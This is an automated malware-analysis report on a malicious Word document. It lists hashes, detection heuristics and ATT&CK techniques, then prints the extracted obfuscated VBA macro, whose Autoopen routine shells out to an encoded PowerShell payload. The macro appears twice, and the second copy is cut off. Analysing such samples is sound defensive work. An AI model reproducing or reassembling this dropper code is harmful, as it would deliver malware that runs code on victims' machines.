Office (OLE) malware analysis — malicious · a69b2d3290ca479b

MALICIOUS

Office (OLE)

99.0 KB Created: 2018-06-12 21:47:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: c9b9097c7c41a8be3af45c5749771937 SHA-1: 775c9f0fb2e101ab1f82e42123d571db4d0408c0 SHA-256: a69b2d3290ca479b5e2f7c8b68f16659b5cdc04f429a1c42a3b27600793594b3

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document containing a VBA macro with an Autoopen subroutine. This subroutine calls a function that uses the Shell command, indicating an attempt to execute arbitrary code. The ClamAV heuristic also flags it as a dropper. The VBA code appears to be obfuscated, but the presence of the Shell call is a strong indicator of malicious intent, likely to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6582932-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6582932-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

wNOFZb = Tan(79962)
kBtkGDRRl = aFscjfahwq + Shell(flizAQE + Chr(MKWNH + vbKeyP + RpMMQvCA) + "owers" + ijulSUHXzw + XojhMdBQN + GNQVlPSz + wfdzu + EinoWiKElO + ARDmRFFn, 14239 - 14239)
bGijC = Tan(98573)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13160 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13160 bytes
SHA-256: `3b4fa953ec4aa533e32732c54ba46c5949efe1447c2900f21ad8d3384a067514`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PBjFkLcrzDViQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function kBtkGDRRl() On Error Resume Next dqtVn = Tan(17963) CAjCJ = mMbhHO bHYoUN = CDbl(KmjZlP) TJHoBj = AIzfSZ dBZwz = Hex(zWRFBa * ChrW(GQUKQ + Int(zSCUsG * Rnd(65086)) * awZIBn * Log(48496 * kHbmjs - rBmbPV + Fix(51)))) opPYaA = Tan(51866) jsRfXY = Tan(85585) AmrafM = iLGWLS iRiqJ = CDbl(sdNYFC) iUEVXw = loYuE GlNTiP = Hex(ZNzBj * ChrW(IFXZS + Int(cmzJG * Rnd(71145)) * MPUptj * Log(73139 * dHPttp - BVUDpI + Fix(51)))) wNOFZb = Tan(79962) kBtkGDRRl = aFscjfahwq + Shell(flizAQE + Chr(MKWNH + vbKeyP + RpMMQvCA) + "owers" + ijulSUHXzw + XojhMdBQN + GNQVlPSz + wfdzu + EinoWiKElO + ARDmRFFn, 14239 - 14239) bGijC = Tan(98573) XGRuh = zHjZfo ioDvpW = CDbl(HbnJK) XfJKNm = wzOlub AFiju = Hex(EbmCmq * ChrW(izwTHk + Int(HRzVMs * Rnd(98669)) * jaSBOK * Log(30672 * sGPWn - tHXWFG + Fix(51)))) AudKlE = Tan(68057) End Function Sub Autoopen() On Error Resume Next MUCoP = Tan(90370) klcWS = DNsNBM qzpms = CDbl(jforcG) tjlNiY = hXmuj Cwhlwk = Hex(LROiPv * ChrW(Ojvtz + Int(lCXbf * Rnd(58562)) * MrTLvC * Log(8208 * jzCusO - bRGzn + Fix(51)))) lAbsuT = Tan(4771) kBtkGDRRl ZGGSGf = Tan(38627) DjMrkf = szGCQb Uhria = CDbl(rSAjBp) rwcli = dNXkw FSjto = Hex(mYSlY * ChrW(cEiHkj + Int(pvVqwX * Rnd(40216)) * Pzszz * Log(89917 * VXIZM - PRrFY + Fix(51)))) JdXWd = Tan(77101) End Sub Attribute VB_Name = "GSjbnWTz" Function ijulSUHXzw() On Error Resume Next FGlVH = Tan(36387) WcqEq = MXITVS fzGiLi = CDbl(tkifQz) dqjvM = roDkV Wqunwk = Hex(RcHAD * ChrW(YUWmu + Int(orpij * Rnd(54505)) * IRpqu * Log(41669 * iLIww - vCiaWq + Fix(51)))) lnhVCI = Tan(49267) YpAOLbRZ = "HeLL -e L" + "gA" + "oACAAJABzA" + "EgAZQBMA" + "GwAaQB" phHNLb = Tan(52594) blMipf = LYpLP JOMqwl = CDbl(kUolw) oiBklI = FGpJL GbVwNz = Hex(ujTvX * ChrW(pGLHz + Int(iJqiKn * Rnd(6398)) * vjCZC * Log(59096 * ftPXa - mlHKFN + Fix(51)))) SNtzs = Tan(66371) wJQWsCQwltk = "EAF" + "sAMQBdACsAJA" + "BT" + "AGgAZQBsAGw" + "AaQ" + "BEAFsAMQA" + "zAF0AKwAnA" dQsKJK = Tan(89574) Oiuss = KMwjW wXiYEZ = CDbl(khmDhT) hPBEO = tXXdP VYIBw = Hex(VvjFh * ChrW(GjjKj + Int(aNYrSv * Rnd(20916)) * VFtYAF * Log(15839 * EFbjqn - YUbhh + Fix(51)))) ikirwC = Tan(4960) OitmBf = "HgAJwApA" + "CgAbgB" + "lAFcALQBP" + "AEI" + "ASgBFAEM" + "AdAAgAF" + "MAe" iFNqDu = Tan(32224) IFcMO = ajAlnC WqNdv = CDbl(UKhECF) azNpm = uXMWFU zJzrLP = Hex(nHOAM * ChrW(EwqaB + Int(GKFbV * Rnd(20109)) * uIdJUH * Log(16910 * rKLqs - FPSkMc + Fix(51)))) owjlUj = Tan(28002) jofYOjY = "QBTAF" + "QARQBNAC4ASQB" + "PAC4AcwBUAH" + "IA" + "ZQBBAE" tidjM = Tan(41254) KzutEz = lfkIn unqJh = CDbl(GJwXz) umzbhJ = QNFUqT jbMAB = Hex(sNiGs * ChrW(wrPiO + Int(uSJKOJ * Rnd(96773)) * cWnpSz * Log(80426 * oizvW - ijIrjM + Fix(51)))) oBfqu = Tan(93415) rTKqBFt = "0AcgB" + "FAEEAZABFA" + "HIAKAAoACAAb" + "gBlA" + "FcALQBPAEIASgBF" PWMCC = Tan(53600) VZonsf = DlkSDG dBXalP = CDbl(VIwYDp) RRutuD = GUDqh lQuYq = Hex(RlVocQ * ChrW(wAQpP + Int(qwmTpY * Rnd(18843)) * WWjUj * Log(8905 * BEOZiM - HwcSd + Fix(51)))) GMpinB = Tan(83236) joRkDwtXnaz = "AEM" + "AdAAgA" + "EkAbwAuAE" + "MA" + "bwBNAFAAUgB" + "FAHMAUwBJ" + "AE8ATgA" + "uAGQAZ" + "QBmA" + "EwAYQB" ijulSUHXzw = YpAOLbRZ + wJQWsCQwltk + OitmBf + jofYOjY + rTKqBFt + joRkDwtXnaz End Function Function XojhMdBQN() On Error Resume Next zwEAj = Tan(75211) PoUtLS = vCPhcS pqXvcw = CDbl(jBhhN) CHJZB = dsHIY OLRnP = Hex(YZjJG * ChrW(EEqkjm + Int(Lwwsns * Rnd(81381)) * Cowhiw * Log(58380 * kssmb - omtBc + Fix(51)))) zisIV = Tan(41113) rErrhHjB = "UAGUAcwBU" + "AFIAZQBBAE" + "0AKAA" + "gAFsAS" + "QB" + "PAC4AbQBlAG0Ab" + "wBSAFkAUwBU" SSTdu = Tan(47834) WkmbYi = qGsqzM KJzlP = CDbl(iTvoM) mLvQO = NBmDAR uuGcAR = Hex(JJIJU * ChrW(iDrCow + Int(LvOvp * Rnd(56480)) * lKQGJi * Log(16023 * bbrvW - DcDlwW + Fix(51)))) KJkPC = Tan(3905) WuVRmAWhQKw = "AFIARQBBAG" + "0AXQB" + "bAE" + "MAbwBuAFYAZQ" + "BSAH" + "QAXQA6ADoAZ" + "gBSAE8ATQB" + "iAGEAUw" zfLmX = Tan(48451) wtBAmj = bQKtb HTLJt = CDbl(ZaBfr) jqVwP = XzGEi lKmJj = Hex(aWadKj * ChrW(CtQzJ + Int(OKtGto * Rnd(59374)) * FViSC * Log(69549 * XiUQr - FUjCj + Fix(51)))) cNLHzz = Tan(15525) sPzvizL = "BFAD" + "YANABzAFQAcgB" + "JAE4AZwAoACcAVg" + "BaAEIA" + "WgBU" + "ADgATQB3AEUA" + "SQBUAC8" qsEtU = Tan(8749) UBvKHv = iKwjR IpMDNw = CDbl(mtNhV) PSiiav = OkTlsY SiBKOf = Hex(LBjBf * ChrW(CGanO + Int(MjrAjV * Rnd(76149)) * ZYWbLo * Log(8473 * DsDSqb - RwduZ + Fix(51)))) IKjWCM = Tan(26168) sCfFST = "AaQBoADgAa" + "QBw" + "AFIAWABVAD" + "QAUgBSAEgAaA" + "BBAFEAVQBLAEUAY" iUoaAt = Tan(76193) EprSSC = kvzkcZ DaOuR = CDbl(pEIbq) VXOrp = QmtnDG FbwbD = Hex(kBjROM * ChrW(bZpAh + Int(bJhLW * Rnd(7183)) * CMnIQ * Log(44657 * bMmtd - zFHoF + Fix(51)))) fiGqzt = Tan(10328) qKSIj = "wA1AEEAMAB" + "JAGcASgBPAFE" + "ANAAyADIAUQB" + "oAH" + "MAUwAxADcAMAB" + "6AFIAV" + "QAv" + "AGUAOABZAE" fIXQaX = Tan(88443) YNYBq = iPmwW PVBtFW = CDbl(avVqP) icSoW = GKahu EJbDr = Hex(AWcYK * ChrW(iKEzT + Int(CXJqHc * Rnd(23029)) * QdQSpo * Log(13932 * BNwXDS - siKRLK + Fix(51)))) OGrvi = Tan(43917) vrOvhj = "sASQBpACsA" + "VwBOAHIAZ" + "ABiAHoA" + "eQ" + "BhAEMAY" + "wB6AEgAUQ" + "BY" + "AE0ANgBa" NBwrR = Tan(75396) FJjWA = JrCvb hRHzKA = CDbl(EOJbt) kYoMw = lfSmZa LKCXEv = Hex(uooFD * ChrW(rBiIwi + Int(MPbVfD * Rnd(32496)) * FPiiXO * Log(78644 * CrFfZ - vjiIK + Fix(51)))) jwKqql = Tan(67218) iFzmhNjJZj = "AEg" + "AdABN" + "AFEAZABQAFQANg" + "BSAHQASQBZ" + "AGwAYQBvAFQARgB" + "kAHgAZwBIA" + "GUAbgB6AD" ihsAii = Tan(79676) KWjZC = fQrCPw smWtd = CDbl(IFnrl) tWVwEB = YWZLcl nQtzoV = Hex(bquWHB * ChrW(jTWiu + Int(JZKRmB * Rnd(39515)) * zSatI * Log(85510 * rMoDQ - Rjaczz + Fix(51)))) sCDhi = Tan(84401) zfEURI = "EAYwBQAGkAN" + "wBlAGsAZ" + "AB" + "RAFEAVgB2AHcATA" + "BpAGoANQB" + "EAD" XojhMdBQN = rErrhHjB + WuVRmAWhQKw + sPzvizL + sCfFST + qKSIj + vrOvhj + iFzmhNjJZj + zfEURI End Function Function GNQVlPSz() On Error Resume Next NGbMmA = Tan(20931) XTczIF = Hhadws jppBzh = CDbl(PtLQRF) kbRPkn = HAwrR vVGEt = Hex(TWmXkD * ChrW(iIaQjr + Int(DWFJON * Rnd(8863)) * corKji * Log(99174 * nHWimO - EjMHEA + Fix(51)))) jPzRwZ = Tan(30364) RakZtO = "IA" + "UwB3" + "AFIARgBjAGY" + "AQQAr" + "AGQASwBKAGYAZQ" pjiiuz = Tan(61818) WwjOnJ = JNpXB BGzkvF = CDbl(LOfadq) qDDTA = FpIVl aCpDJB = Hex(SnZiw * ChrW(sDOHTI + Int(wrWGKV * Rnd(44160)) * YMwizB * Log(59743 * VLWYP - dQYFV + Fix(51)))) UqioM = Tan(261) zKvrwhtiq = "BUA" + "EkAcwBpAE0AeAB" + "1AEYARABW" + "AE4AdwA3AGMAeQB" + "oAGEAaQAwAGIATA" ifjtni = Tan(69584) baAwwN = twzkVX FhFAO = CDbl(hiJRz) wulRi = fdCpYG vqzlr = Hex(iZVaCo * ChrW(PaNzRj + Int(sRjHiO * Rnd(80348)) * tLQJwc * Log(37657 * jsSoU - bTjdvi + Fix(51)))) QEYoG = Tan(60911) OlUpcAS = "BrAHAAbwA1AHUA" + "bgB0AGgAeQ" + "B1AEQAZABiAFgAb" + "wAvADEALwBTAE" + "YAbwA3AFYAT" GpGcno = Tan(61096) KtpKw = dEwvf pPYAS = CDbl(kdGrU) wpMulp = fwRJp khznza = Hex(bRoqRF * ChrW(bDCDS + Int(wNGuj * Rnd(36746)) * tzOYG * Log(66697 * hdnpH - bRiBV + Fix(51)))) ffZbwO = Tan(82177) OQNznNGKFIL = "wBDAGMAb" + "wB6AHAARABjAEQ" + "AegBYAHIAUwBpA" + "GQAVgBxAFgA" + "ZgBjAHEAbQBy" + "AHEARAA4ACsAegB" + "3AGUASABa" + "ADMAKwBpAEMAb" + "ABWAGgAaQB0A" + "HEA" sWbCD = Tan(62476) zbCPk = ucwQMv wfjFZ = CDbl(ndUXS) PRTLC = maAcpb lulDbL = Hex(SpUMnV * ChrW(ztmiEk + Int(URaRv * Rnd(60538)) * VBUqHT * Log(75934 * BasMi - awHXjH + Fix(51)))) hNzlrj = Tan(32445) ViphZ = "Zg" + "BU" + "AEUA" + "MQ" + "BnAHYANQBuA" + "DcAOABYAEEARg" + "BQAHgA" + "YgArADkAU" + "QBFAHMAdA" LmfjIz = Tan(76704) WjCqlr = mrBNu StPYm = CDbl(nXFPnW) poMjZu = wkqiRC BKtpSW = Hex(ssQHW * ChrW(AcRQO + Int(DCXZL * Rnd(53096)) * HXhDk * Log(13105 * wmMLZU - YwwvYD + Fix(51)))) mUTaPz = Tan(97453) BrCpPkROqCw = "BLAG4ATwBy" + "AEIANQ" + "B6AFcAMABmA" + "DQAawBEADEAb" + "QB0ACsANQ" GNQVlPSz = RakZtO + zKvrwhtiq + OlUpcAS + OQNznNGKFIL + ViphZ + BrCpPkROqCw End Function Function wfdzu() On Error Resume Next dlhOzP = Tan(72337) pjBnL = QFquT FbinYh = CDbl(DOcVI) KJbiLU = nmHPXP ZDOjVi = Hex(iCHtp * ChrW(uiwML + Int(CAEpaf * Rnd(48815)) * rTUOQI * Log(14391 * AztziR - GTkVCq + Fix(51)))) puEiN = Tan(49636) KEWdRT = "BhADUAQQ" + "B1A" + "FkARgBKAGIAQQBH" + "ADE" + "AYwBjA" + "DEAVQBoAEgAMgA2" + "AE" NnEvv = Tan(53308) isdjK = hwSLNl zVpJW = CDbl(mdZKlv) bmLpDi = NYbHos XsbsRc = Hex(WswvZ * ChrW(plIhr + Int(cWvldH * Rnd(59148)) * KYuhUi * Log(98873 * kzRUT - EtNtif + Fix(51)))) cQtQD = Tan(28918) VYSQOVzzz = "8ATAA0ADYAZQBkA" + "EsATwBTAEoASw" + "BaAEUANgA0AFgA" + "NwBZA" + "GoAWQBNAE" + "MAa" + "wA4AEg" + "AMQB5AEUAYwBM" + "AGYA" + "cQByAGkA" bHwlm = Tan(62784) wwQauE = ALQXS SCXjcz = CDbl(iIARQP) odzjhm = GvwTja bFdtlR = Hex(ZjOIn * ChrW(KpzzJf + Int(lXLjpf * Rnd(19495)) * GbQsY * Log(38279 * DWXfw - PulYu + Fix(51)))) dQzzJ = Tan(9592) RIvAGqArnt = "QwBpAGI" + "AVQBXAFYAMQBtAG" + "0Ae" + "AB0AHIATwB4AHQ" + "AYg" + "BuAG0AaAB1A" pEttE = Tan(10653) sSIzP = RDmbb jBWdaL = CDbl(ijuJdH) YiCJdT = qhwlnI jZiWVi = Hex(wTbTi * ChrW(aazJi + Int(bqnAcz * Rnd(16445)) * qUZrm * Log(5641 * vHPmI - PZKbqu + Fix(51)))) zQjnH = Tan(96401) qnfLwQUCGj = "GEAMwB3A" + "DIAWA" + "B3AF" + "MAbwA4AGE" + "AN" + "QB2AHgAN" + "wBBAG" + "wARgBy" + "ADYARQAvAHYA" qvZCYM = Tan(51849) itjhfv = ThWVNL dZmCz = CDbl(akmjo) XziNO = BivQrJ NTwBQ = Hex(lVZSzQ * ChrW(NWHtH + Int(sJYflU * Rnd(15573)) * LdVMhc * Log(75315 * kdjVwD - zhizsi + Fix(51)))) aBJrQG = Tan(79007) QIAwiGnPt = "MQB" + "WACsANQ" + "BuAE" + "QAQgBNAEoA" + "NA" + "BwAEMAM" + "ABJAFcAWA" LhILZs = Tan(8271) Snibl = KmBpJa DWPsfC = CDbl(DpMjw) SBMndH = bPKKGt qWqawO = Hex(IKtTtp * ChrW(CcaBfp + Int(JZOMC * Rnd(63005)) * nMElm * Log(12953 * jzlkiF - qTTjR + Fix(51)))) ZnjJb = Tan(8573) KczUwcmZ = "BTAEMAbwAzAE" + "8A" + "Uw" + "BGAFU" + "AUABGA" + "DUAdAAxADEAcA" + "AyA" + "FQAYgA2AGIA" + "eA" + "B5AGYAcQBRA" hzbOth = Tan(39449) wohHi = VdpQw BSGuck = CDbl(wzdvK) WwjXWq = lpsim iDDJts = Hex(UiOqhm * ChrW(KXUUs + Int(ZMJmG * Rnd(35780)) * wwMZcI * Log(99976 * TsqkD - Moisqk + Fix(51)))) pNUYlQ = Tan(4563) RlzEYpKbX = "GIAVgB" + "XAH" + "EAUgBuAFcAQQBKA" + "GMANQBiAGYAN" + "gA0AFEAcwBx" + "AHIAegBUAF" + "gAVwBaA" tRDbR = Tan(64104) VoOZm = qfikp MXbuQi = CDbl(HlrBqs) fabmIl = rStdRz whqov = Hex(pwSXn * ChrW(YZkdnY + Int(ocQDrb * Rnd(6728)) * VFiQzk * Log(37372 * DBNuS - jIDzQ + Fix(51)))) ZGpGF = Tan(69268) srrKiFaz = "HoAegAyA" + "DYAYwBrA" + "EkALwBRAHUANw" + "BGAG" + "EAKwBoA" wfdzu = KEWdRT + VYSQOVzzz + RIvAGqArnt + qnfLwQUCGj + QIAwiGnPt + KczUwcmZ + RlzEYpKbX + srrKiFaz End Function Function EinoWiKElO() On Error Resume Next zhdwM = Tan(85496) TtjGoI = QjbZd jwIAs = CDbl(qRPQb) PbWbZ = ACiom zLIII = Hex(NjbVc * ChrW(YdGBC + Int(EdHuY * Rnd(62313)) * pHYZbf * Log(85020 * kCjCh - pCvju + Fix(51)))) VCvzwA = Tan(33364) KjBPaiTEQ = "Fo" + "ALwAxADM" + "ASABxAFQA" + "ZAA3AGoAb" + "QBSAFEAa" + "wBpADIA" + "bABqAGsAYQBC" + "AFg" + "AYQBF" IQCmbZ = Tan(37670) pHApj = obZzUI bMLij = CDbl(mLaaa) HBUzt = IpXNoi PiOUX = Hex(fIVhDr * ChrW(uLjHO + Int(ZabpUb * Rnd(61090)) * LTrNY * Log(53956 * QjYrC - vGmUQI + Fix(51)))) jzIQzI = Tan(17515) cERHU = "AGMA" + "cwB" + "lAE8AWABIAEUA" + "dwBt" + "AE" + "cAVQBDAHQAKwA" + "2AFIAVQBpAGgAM" + "wBnADI" nptssb = Tan(38066) iTfPhi = IQLEiU UDTtrO = CDbl(bOPSv) tiwKAb = HAksE UzAnD = Hex(JzUpZw * ChrW(FdDFPw + Int(BiiRAE * Rnd(5495)) * iUTbp * Log(80207 * LbbMol - YoZMQW + Fix(51)))) EuUvSB = Tan(72997) MDMQBHzXlz = "AKwB3AFEAPQ" + "AnAC" + "AAKQAgAC" + "wAIABbAHM" imwbG = Tan(30211) WzJtK = ciDIA Jpsoo = CDbl(PdZwfX) IqsoNM = PYSbDW WcQRn = Hex(fcjpz * ChrW(vrlaX + Int(lFCbj * Rnd(79961)) * vVGlXR * Log(71518 * UsBJh - FJfKCr + Fix(51)))) Qndzu = Tan(17307) IhbdpzO = "AeQBzA" + "HQA" + "ZQBt" + "AC4ASQB" + "vA" + "C4AQwBPA" + "E0AUAByAGUAcw" EinoWiKElO = KjBPaiTEQ + cERHU + MDMQBHzXlz + IhbdpzO End Function Function ARDmRFFn() On Error Resume Next RJvsa = Tan(53583) zYqIYM = bzkRpZ vWRjwm = CDbl(hdncIT) LwJiF = IloBi KpotjE = Hex(kVmiLc * ChrW(MPvDfQ + Int(sPCaij * Rnd(47471)) * KhPCT * Log(53526 * tjHYZj - YSzGQo + Fix(51)))) plVNlR = Tan(50467) hWHWlNT = "BTAGkATwBuAC4" + "AYw" + "BvAG0AcAB" + "yAGUAcwBT" + "AGkAbwB" + "OAG0Abw" + "Bk" + "AGUAXQA6A" + "DoARABlAEMA" + "TwBtAHAAUgBFA" SzUKLL = Tan(9260) IINXW = wHrJO kccTjj = CDbl(wupiK) HQJDO = TUDpz RWdpN = Hex(cDjBq * ChrW(BafqI + Int(TaDIO * Rnd(91094)) * EcluWh * Log(76163 * RSKqGj - FGfGa + Fix(51)))) CoscLi = Tan(41463) TNTlTXp = "HMAUwA" + "gACkAKQAgAC" + "wAIABbAFQARQB4A" + "HQALgBFAG4AYwB" + "PAGQAaQB" + "OAGc" + "AXQA6ADoAYQBTAE" + "MAS" wJHiC = Tan(17728) qIMTCq = IUABoB wdIUz = CDbl(osSLz) GSJCI = XYOwS XwSfXc = Hex(tUDBj * ChrW(NFGFwp + Int(UkjQz * Rnd(35393)) * zRcFwK * Log(40896 * wkIVqB - zDRcD + Fix(51)))) wQSQIR = Tan(34819) LUMlI = "QBJACkAKQA" + "uAFIARQBhA" + "GQAdABvAEUAb" + "gBkACgAK" + "QA=" ARDmRFFn = hWHWlNT + TNTlTXp + LUMlI End Function

SHA-256: 3b4fa953ec4aa533e32732c54ba46c5949efe1447c2900f21ad8d3384a067514

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PBjFkLcrzDViQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kBtkGDRRl()
On Error Resume Next
dqtVn = Tan(17963)
CAjCJ = mMbhHO
bHYoUN = CDbl(KmjZlP)
TJHoBj = AIzfSZ
dBZwz = Hex(zWRFBa * ChrW(GQUKQ + Int(zSCUsG * Rnd(65086)) * awZIBn * Log(48496 * kHbmjs - rBmbPV + Fix(51))))
opPYaA = Tan(51866)
jsRfXY = Tan(85585)
AmrafM = iLGWLS
iRiqJ = CDbl(sdNYFC)
iUEVXw = loYuE
GlNTiP = Hex(ZNzBj * ChrW(IFXZS + Int(cmzJG * Rnd(71145)) * MPUptj * Log(73139 * dHPttp - BVUDpI + Fix(51))))
wNOFZb = Tan(79962)
kBtkGDRRl = aFscjfahwq + Shell(flizAQE + Chr(MKWNH + vbKeyP + RpMMQvCA) + "owers" + ijulSUHXzw + XojhMdBQN + GNQVlPSz + wfdzu + EinoWiKElO + ARDmRFFn, 14239 - 14239)
bGijC = Tan(98573)
XGRuh = zHjZfo
ioDvpW = CDbl(HbnJK)
XfJKNm = wzOlub
AFiju = Hex(EbmCmq * ChrW(izwTHk + Int(HRzVMs * Rnd(98669)) * jaSBOK * Log(30672 * sGPWn - tHXWFG + Fix(51))))
AudKlE = Tan(68057)
End Function
Sub Autoopen()
On Error Resume Next
MUCoP = Tan(90370)
klcWS = DNsNBM
qzpms = CDbl(jforcG)
tjlNiY = hXmuj
Cwhlwk = Hex(LROiPv * ChrW(Ojvtz + Int(lCXbf * Rnd(58562)) * MrTLvC * Log(8208 * jzCusO - bRGzn + Fix(51))))
lAbsuT = Tan(4771)
kBtkGDRRl
ZGGSGf = Tan(38627)
DjMrkf = szGCQb
Uhria = CDbl(rSAjBp)
rwcli = dNXkw
FSjto = Hex(mYSlY * ChrW(cEiHkj + Int(pvVqwX * Rnd(40216)) * Pzszz * Log(89917 * VXIZM - PRrFY + Fix(51))))
JdXWd = Tan(77101)
End Sub


Attribute VB_Name = "GSjbnWTz"
Function ijulSUHXzw()
On Error Resume Next
FGlVH = Tan(36387)
WcqEq = MXITVS
fzGiLi = CDbl(tkifQz)
dqjvM = roDkV
Wqunwk = Hex(RcHAD * ChrW(YUWmu + Int(orpij * Rnd(54505)) * IRpqu * Log(41669 * iLIww - vCiaWq + Fix(51))))
lnhVCI = Tan(49267)
YpAOLbRZ = "HeLL -e L" + "gA" + "oACAAJABzA" + "EgAZQBMA" + "GwAaQB"
phHNLb = Tan(52594)
blMipf = LYpLP
JOMqwl = CDbl(kUolw)
oiBklI = FGpJL
GbVwNz = Hex(ujTvX * ChrW(pGLHz + Int(iJqiKn * Rnd(6398)) * vjCZC * Log(59096 * ftPXa - mlHKFN + Fix(51))))
SNtzs = Tan(66371)
wJQWsCQwltk = "EAF" + "sAMQBdACsAJA" + "BT" + "AGgAZQBsAGw" + "AaQ" + "BEAFsAMQA" + "zAF0AKwAnA"
dQsKJK = Tan(89574)
Oiuss = KMwjW
wXiYEZ = CDbl(khmDhT)
hPBEO = tXXdP
VYIBw = Hex(VvjFh * ChrW(GjjKj + Int(aNYrSv * Rnd(20916)) * VFtYAF * Log(15839 * EFbjqn - YUbhh + Fix(51))))
ikirwC = Tan(4960)
OitmBf = "HgAJwApA" + "CgAbgB" + "lAFcALQBP" + "AEI" + "ASgBFAEM" + "AdAAgAF" + "MAe"
iFNqDu = Tan(32224)
IFcMO = ajAlnC
WqNdv = CDbl(UKhECF)
azNpm = uXMWFU
zJzrLP = Hex(nHOAM * ChrW(EwqaB + Int(GKFbV * Rnd(20109)) * uIdJUH * Log(16910 * rKLqs - FPSkMc + Fix(51))))
owjlUj = Tan(28002)
jofYOjY = "QBTAF" + "QARQBNAC4ASQB" + "PAC4AcwBUAH" + "IA" + "ZQBBAE"
tidjM = Tan(41254)
KzutEz = lfkIn
unqJh = CDbl(GJwXz)
umzbhJ = QNFUqT
jbMAB = Hex(sNiGs * ChrW(wrPiO + Int(uSJKOJ * Rnd(96773)) * cWnpSz * Log(80426 * oizvW - ijIrjM + Fix(51))))
oBfqu = Tan(93415)
rTKqBFt = "0AcgB" + "FAEEAZABFA" + "HIAKAAoACAAb" + "gBlA" + "FcALQBPAEIASgBF"
PWMCC = Tan(53600)
VZonsf = DlkSDG
dBXalP = CDbl(VIwYDp)
RRutuD = GUDqh
lQuYq = Hex(RlVocQ * ChrW(wAQpP + Int(qwmTpY * Rnd(18843)) * WWjUj * Log(8905 * BEOZiM - HwcSd + Fix(51))))
GMpinB = Tan(83236)
joRkDwtXnaz = "AEM" + "AdAAgA" + "EkAbwAuAE" + "MA" + "bwBNAFAAUgB" + "FAHMAUwBJ" + "AE8ATgA" + "uAGQAZ" + "QBmA" + "EwAYQB"
ijulSUHXzw = YpAOLbRZ + wJQWsCQwltk + OitmBf + jofYOjY + rTKqBFt + joRkDwtXnaz
End Function
Function XojhMdBQN()
On Error Resume Next
zwEAj = Tan(75211)
PoUtLS = vCPhcS
pqXvcw = CDbl(jBhhN)
CHJZB = dsHIY
OLRnP = Hex(YZjJG * ChrW(EEqkjm + Int(Lwwsns * Rnd(81381)) * Cowhiw * Log(58380 * kssmb - omtBc + Fix(51))))
zisIV = Tan(41113)
rErrhHjB = "UAGUAcwBU" + "AFIAZQBBAE" + "0AKAA" + "gAFsAS" + "QB" + "PAC4AbQBlAG0Ab" + "wBSAFkAUwBU"
SSTdu = Tan(47834)
WkmbYi = qGsqzM
KJzlP = CDbl(iTvoM)
mLvQO = NBmDAR
uuGcAR = Hex(JJIJU * ChrW(iDrCow + Int(LvOvp * Rnd(56480)) * lKQGJi * Log(16023 * bbrvW - DcDlwW + Fix(51))))
KJkPC = Tan(3905)
WuVRmAWhQKw = "AFIARQBBAG" + "0AXQB" + "bAE" + "MAbwBuAFYAZQ" + "BSAH" + "QAXQA6ADoAZ" + "gBSAE8ATQB" + "iAGEAUw"
zfLmX = Tan(48451)
wtBAmj = bQKtb
HTLJt = CDbl(ZaBfr)
jqVwP = XzGEi
lKmJj = Hex(aWadKj * ChrW(CtQzJ + Int(OKtGto * Rnd(59374)) * FViSC * Log(69549 * XiUQr - FUjCj + Fix(51))))
cNLHzz = Tan(15525)
sPzvizL = "BFAD" + "YANABzAFQAcgB" + "JAE4AZwAoACcAVg" + "BaAEIA" + "WgBU" + "ADgATQB3AEUA" + "SQBUAC8"
qsEtU = Tan(8749)
UBvKHv = iKwjR
IpMDNw = CDbl(mtNhV)
PSiiav = OkTlsY
SiBKOf = Hex(LBjBf * ChrW(CGanO + Int(MjrAjV * Rnd(76149)) * ZYWbLo * Log(8473 * DsDSqb - RwduZ + Fix(51))))
IKjWCM = Tan(26168)
sCfFST = "AaQBoADgAa" + "QBw" + "AFIAWABVAD" + "QAUgBSAEgAaA" + "BBAFEAVQBLAEUAY"
iUoaAt = Tan(76193)
EprSSC = kvzkcZ
DaOuR = CDbl(pEIbq)
VXOrp = QmtnDG
FbwbD = Hex(kBjROM * ChrW(bZpAh + Int(bJhLW * Rnd(7183)) * CMnIQ * Log(44657 * bMmtd - zFHoF + Fix(51))))
fiGqzt = Tan(10328)
qKSIj = "wA1AEEAMAB" + "JAGcASgBPAFE" + "ANAAyADIAUQB" + "oAH" + "MAUwAxADcAMAB" + "6AFIAV" + "QAv" + "AGUAOABZAE"
fIXQaX = Tan(88443)
YNYBq = iPmwW
PVBtFW = CDbl(avVqP)
icSoW = GKahu
